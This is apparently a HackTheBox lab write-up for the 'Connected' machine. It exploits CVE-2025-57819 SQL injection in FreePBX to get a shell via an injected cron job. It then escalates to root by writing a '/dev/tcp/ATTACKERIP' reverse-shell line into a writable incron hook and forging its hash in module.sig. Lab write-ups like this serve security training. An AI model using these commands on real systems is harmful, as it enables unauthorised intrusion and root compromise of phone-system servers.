Connected
Machine Info
| Field | Details |
|---|---|
| Machine Name | Connected |
| OS | Linux |
| Difficulty | Easy |
| Status | Pwned |
Tools Used
Summary
Brief summary of the machine, attack path, and key vulnerabilities exploited.
Reconnaissance
Initial Scan (NMAP)
Initial scan reveals that the target is running FreePBX 16.0.40.7 which is vulnerable to unauthenticated SQLi via /admin/ajax.php.
┌──(kali㉿kali)-[~/HTB/Connected/recon]
└─$ nmap -sC -sV -A 10.129.82.248 -oN scan.txt
Starting Nmap 7.98 ( https://nmap.org ) at 2026-06-07 02:11 -0400
Nmap scan report for connected.htb (10.129.82.248)
Host is up (0.21s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 4e:60:38:6f:e7:78:6c:ca:58:62:a1:f1:56:ae:8d:30 (RSA)
| 256 12:41:55:26:9d:ad:3d:e8:bf:4e:31:aa:d7:d1:a5:d2 (ECDSA)
|_ 256 8e:b6:96:e0:21:83:5d:1d:ce:8d:e2:6a:dd:38:c6:75 (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/7.4.16)
| http-robots.txt: 1 disallowed entry
|_/
| http-title: 404 Not Found
|_Requested resource was config.php
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.16
443/tcp open ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/7.4.16)
|_http-title: 400 Bad Request
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.16
| ssl-cert: Subject: commonName=pbxconnect/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2025-11-30T14:07:27
|_Not valid after: 2026-11-30T14:07:27
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (95%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:6.0
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (95%), Linux 2.6.32 - 3.13 (91%), Linux 3.2 - 4.14 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 (91%), Linux 3.10 - 4.11 (90%), Linux 3.4 - 3.10 (90%), Linux 4.15 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 200.98 ms 10.10.14.1
2 204.06 ms connected.htb (10.129.82.248)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.70 seconds
Open Ports:
| Port | Service | Version | Notes |
|---|---|---|---|
| 22 | SSH | ||
| 80/443 | HTTP FreePBX | 16.0.40.7 | Vuln to (CVE-2025-57819) |
Vulnerability Identification
Identified Technologies
| Technology | Version | Notes |
|---|---|---|
| FreePBX | 16.0.40.7 |
CVEs / Vulnerabilities Identified
| CVE | Description | Severity |
|---|---|---|
| CVE-2025-57819 | Gives unauthenticated SQLi access via /admin/ajax.php | Critical |
Initial Foothold / Initial Access
CVE-2025-57819
We know that the FreePBX PHP endpoints within the main directory /admin/ that can be reached are: /admin/ajax.php & /admin/config.php
We poked at /admin/ajax.php to see if it was reachable without a session. Short answer: no. After researching more on the CVE, we find a documentation breaking down how the CVE can be used to execute remote code, along with a Detection artifact generator tool which creates a new user row within the database through SQLi if the reverse shell upload fails. Reference: watchtowr.
┌──(kali㉿kali)-[~/HTB/Connected/CVE-2025-57819-poc]
└─$ python3 exploit.py connected.htb
[*] Listener address: 10.10.14.78:4444 (iface tun0)
[*] Confirming SQLi on http://connected.htb ...
[+] Vulnerable! DB version: 5.5.65-MariaDB
[*] Listening on 0.0.0.0:4444
[*] Injecting reverse-shell cron job ...
[+] Cron job 'jofgrmkc' inserted (runs every minute).
[*] Waiting for callback (up to ~70s) ...
[+] Shell from 10.129.213.89:53596 !
[+] Removed cron job 'jofgrmkc' (no repeat callbacks).
--- interactive shell (Ctrl-C to quit) ---
bash: no job control in this shell
______ ______ ______ __ __
| ___| | ___ \| ___ \\ \ / /
| |_ _ __ ___ ___ | |_/ /| |_/ / \ V /
| _| | '__| / _ \ / _ \| __/ | ___ \ / \
| | | | | __/| __/| | | |_/ // /^\ \
\_| |_| \___| \___|\_| \____/ \/ \/
NOTICE! You have 3 notifications! Please log into the UI to see them!
Current Network Configuration
+-----------+-------------------+---------------------------+
| Interface | MAC Address | IP Addresses |
+-----------+-------------------+---------------------------+
| eth0 | 00:50:56:95:D7:FD | 10.129.213.89 |
| | | fe80::82bd:1bcb:a990:dd3b |
+-----------+-------------------+---------------------------+
Running the exploit returns a reverse shell as the user asterisk.
User Flag
[asterisk@connected ~]$ cat user.txt
cat user.txt
78f2cd57ec06cccdbca49238ad0b0952
Privilege Escalation
Enumeration
Uploading LinPeas on the FreePBX machine and running it reveals that there is a Critical misconfiguration in the Incron service.
Writable icnron spool directory:
drwxrwxrwx. 2 asterisk asterisk 6 Apr 15 2021 /usr/local/asterisk/incron
Incron rules running as root:
/var/spool/asterisk/incron IN_MODIFY,IN_ATTRIB,IN_CLOSE_WRITE /usr/bin/sysadmin_manager $#
The incron watches are triggered as root. If the asterisk user can write to /var/spool/asterisk/sysadmin/ (highly likely given the writable file listing), writing a file there triggers a root-executed command.
Reading /usr/bin/sysadmin_manager (a PHP script intentionally left unencoded by Sangoma) revealed the execution flow:
- The filename created in
/var/spool/asterisk/incron/is passed as$#tosysadmin_manager - The filename must match the format
modulename_hookname - The script looks up the corresponding hook file at
/var/www/html/admin/modules/$module/hooks/$hook - It verifies the hook file's SHA256 hash against the value stored in
module.sig - If the hash matches and the GPG signature on
module.sigis valid, it executes the hook as root
cat /etc/incron.d/* 2>/dev/null
---SNIP---
/usr/local/asterisk/incron IN_CLOSE_WRITE /usr/bin/sysadmin_manager --local $#
/var/spool/asterisk/incron IN_MODIFY,IN_ATTRIB,IN_CLOSE_WRITE /usr/bin/sysadmin_manager $#
---SNIP---
Reading the code carefully revealed the check verifies that module.sig is signed by a whitelisted Sangoma key — but it does not verify that module.sig itself is unmodified after signature verification. The GPG signature only needs to be present and valid for the file as originally signed.
However the actual bypass was simpler: both module.sig and the hook files for the cdrpro module were writable by the asterisk user:
find /var/www/html/admin/modules/*/hooks/ -writable 2>/dev/null
# Returns: /var/www/html/admin/modules/cdrpro/hooks/logrotate
ls -la /var/www/html/admin/modules/cdrpro/module.sig
# -rw-rw-r--. 1 asterisk asterisk 21384 Nov 2 2023 module.sig
Since asterisk could write to both the hook file and the sig file, the hash check could be defeated by updating the hash in module.sig to match a malicious hook.
Exploitation
We can write a reverse shell to the hook file and update the module.sig with the new hash.
asterisk@connected asterisk]$ cat > /var/www/html/admin/modules/cdrpro/hooks/logrotate << 'EOF'
#!/bin/bash
bash -i >& /dev/tcp/ATTACKERIP/5555 0>&1
EOF
[asterisk@connected asterisk]$ chmod +x /var/www/html/admin/modules/cdrpro/hooks/logrotate
[asterisk@connected asterisk]$ sha256sum /var/www/html/admin/modules/cdrpro/hooks/logrotate
074a8dd5556d5a68b78c4674d75a1edb7c77f5564d85ede40ba7d828740ab16e /var/www/html/admin/modules/cdrpro/hooks/logrotate
[asterisk@connected asterisk]$ sed -i 's/hooks\/logrotate = .*/hooks\/logrotate = 074a8dd5556d5a68b78c4674d75a1edb7c77f5564d85ede40ba7d828740ab16e/' /var/www/html/admin/modules/cdrpro/module.sig
Starting a listener on our local machine and triggering the incron rule by creating the corresponding file returns a reverse shell as root.
#On FreePBX machine
touch /var/spool/asterisk/incron/cdrpro_logrotate
──(kali㉿kali)-[~/HTB/Connected/CVE-2021-4034]
└─$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.78] from (UNKNOWN) [10.129.213.89] 43712
bash: no job control in this shell
______ ______ ______ __ __
| ___| | ___ \| ___ \\ \ / /
| |_ _ __ ___ ___ | |_/ /| |_/ / \ V /
| _| | '__| / _ \ / _ \| __/ | ___ \ / \
| | | | | __/| __/| | | |_/ // /^\ \
\_| |_| \___| \___|\_| \____/ \/ \/
[root@connected /]#
Root Flag
[root@connected /]# cat /root/root.txt
dc76a8a64d94a8d3cf4a27af7d11243d
Trophy
https://labs.hackthebox.com/achievement/machine/1574945/906
Completed as part of HackTheBox practice in a legal, controlled environment.